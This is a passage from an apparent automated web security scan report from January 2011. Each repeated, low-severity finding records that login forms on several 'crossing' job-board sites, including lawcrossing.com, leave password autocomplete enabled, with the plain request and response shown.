<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.hrcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.69. http://www.hvaccrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hvaccrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.hvaccrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:32 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pber3q1f9cj4n51gq3upv43jp0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:32 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112628

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.hvaccrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.70. http://www.informationtechnologycrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.informationtechnologycrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.informationtechnologycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:43 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=k1m7ouon0b4rcae41h2bgg8ig6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:43 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133954

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.informationtechnologycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.71. http://www.insurcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.insurcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.insurcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ecpq66kc364asgd97g8ralsb30; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 127189

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.insurcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.72. http://www.intellectualpropertycrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.intellectualpropertycrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.intellectualpropertycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ajhbe62huej7qoq1voq8lsteu4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 118144

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.intellectualpropertycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.73. http://www.internshipcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.internshipcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.internshipcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:49 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ol3jscv0r1flgbhg63mnc21c14; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 132111

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.internshipcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.74. http://www.j2eecrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.j2eecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.j2eecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:53 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ov4jbk2b77peoidd95qi1upha7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:54 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111694

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.j2eecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.75. http://www.journalismcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.journalismcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.journalismcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:09 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bai2pstv5ao7rak55ou3up3b17; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:09 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111259

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.journalismcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.76. http://www.lawcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lawcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=h9gb6ofdn09dkbjophfsddmto3; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 211204

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Legal Jobs | Law Jobs | Legal Job Search | Law Firm And Legal Recruiter | La
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="" onsubmit="return login();">
                       <input type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
me" size="14" maxlength="25" tabindex="1" class="inputbox" value="Username" onfocus="setfocusvalue(this,'Username');" onblur="getfocusvalue(this,'Username');">
    &nbsp;&nbsp;<input type="password" name="clslogin_password" maxlength="16" size="16" tabindex="2" class="inputbox" value="*****" onfocus="setfocusvalue(this,'*****');" onblur="getfocusvalue(this,'*****');">
&nbsp;&nbsp;<input type="submit" name="submit" value="Log In" tabindex="3" class="button">
...[SNIP]...

11.77. http://www.lawcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lawcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /?utm_source=JDJournal&utm_medium=Banner&utm_campaign=leverage-300x250\ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:13 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gs1oh9i6kad359a0jna6e84qs7; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 211139

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Legal Jobs | Law Jobs | Legal Job Search | Law Firm And Legal Recruiter | La
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="" onsubmit="return login();">
                       <input type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
me" size="14" maxlength="25" tabindex="1" class="inputbox" value="Username" onfocus="setfocusvalue(this,'Username');" onblur="getfocusvalue(this,'Username');">
    &nbsp;&nbsp;<input type="password" name="clslogin_password" maxlength="16" size="16" tabindex="2" class="inputbox" value="*****" onfocus="setfocusvalue(this,'*****');" onblur="getfocusvalue(this,'*****');">
&nbsp;&nbsp;<input type="submit" name="submit" value="Log In" tabindex="3" class="button">
...[SNIP]...

11.78. http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lawcrossing.com
Path:   /article/6070/Brooklyn-Law-School/

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /article/6070/Brooklyn-Law-School/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:46 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=vl8einafm1n540cl32q4l331g3; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 144794

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="" onsubmit="return login();">
                       <input type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
me" size="14" maxlength="25" tabindex="1" class="inputbox" value="Username" onfocus="setfocusvalue(this,'Username');" onblur="getfocusvalue(this,'Username');">
    &nbsp;&nbsp;<input type="password" name="clslogin_password" maxlength="16" size="16" tabindex="2" class="inputbox" value="*****" onfocus="setfocusvalue(this,'*****');" onblur="getfocusvalue(this,'*****');">
&nbsp;&nbsp;<input type="submit" name="submit" value="Log In" tabindex="3" class="button">
...[SNIP]...

11.79. http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lawcrossing.com
Path:   /article/6154/Anne-Healy-LIDS/

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /article/6154/Anne-Healy-LIDS/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:39 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kn84m4kfq0k9i5413blcf4rdv5; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 144589

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="" onsubmit="return login();">
                       <input type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
me" size="14" maxlength="25" tabindex="1" class="inputbox" value="Username" onfocus="setfocusvalue(this,'Username');" onblur="getfocusvalue(this,'Username');">
    &nbsp;&nbsp;<input type="password" name="clslogin_password" maxlength="16" size="16" tabindex="2" class="inputbox" value="*****" onfocus="setfocusvalue(this,'*****');" onblur="getfocusvalue(this,'*****');">
&nbsp;&nbsp;<input type="submit" name="submit" value="Log In" tabindex="3" class="button">
...[SNIP]...

11.80. http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lawcrossing.com
Path:   /images/banner/lc_bannerforjdj125x125.gif/

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /images/banner/lc_bannerforjdj125x125.gif/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 19:41:09 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=d2dplbacjvjkr67gtesru8aj04; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:10 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103110

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="" onsubmit="return login();">
                       <input type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
me" size="14" maxlength="25" tabindex="1" class="inputbox" value="Username" onfocus="setfocusvalue(this,'Username');" onblur="getfocusvalue(this,'Username');">
    &nbsp;&nbsp;<input type="password" name="clslogin_password" maxlength="16" size="16" tabindex="2" class="inputbox" value="*****" onfocus="setfocusvalue(this,'*****');" onblur="getfocusvalue(this,'*****');">
&nbsp;&nbsp;<input type="submit" name="submit" value="Log In" tabindex="3" class="button">
...[SNIP]...

11.81. http://www.lawcrossing.com/lcjssearchresults.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lawcrossing.com
Path:   /lcjssearchresults.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /lcjssearchresults.php HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=e5iouh0ohr4puh7rj3ce3m03n5; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 92150

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="" onsubmit="return login();">
                       <input type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
me" size="14" maxlength="25" tabindex="1" class="inputbox" value="Username" onfocus="setfocusvalue(this,'Username');" onblur="getfocusvalue(this,'Username');">
    &nbsp;&nbsp;<input type="password" name="clslogin_password" maxlength="16" size="16" tabindex="2" class="inputbox" value="*****" onfocus="setfocusvalue(this,'*****');" onblur="getfocusvalue(this,'*****');">
&nbsp;&nbsp;<input type="submit" name="submit" value="Log In" tabindex="3" class="button">
...[SNIP]...

11.82. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lawcrossing.com
Path:   /salarysurvey/lcsalarysurvey.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /salarysurvey/lcsalarysurvey.php HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 22:29:48 GMT
Server: Apache
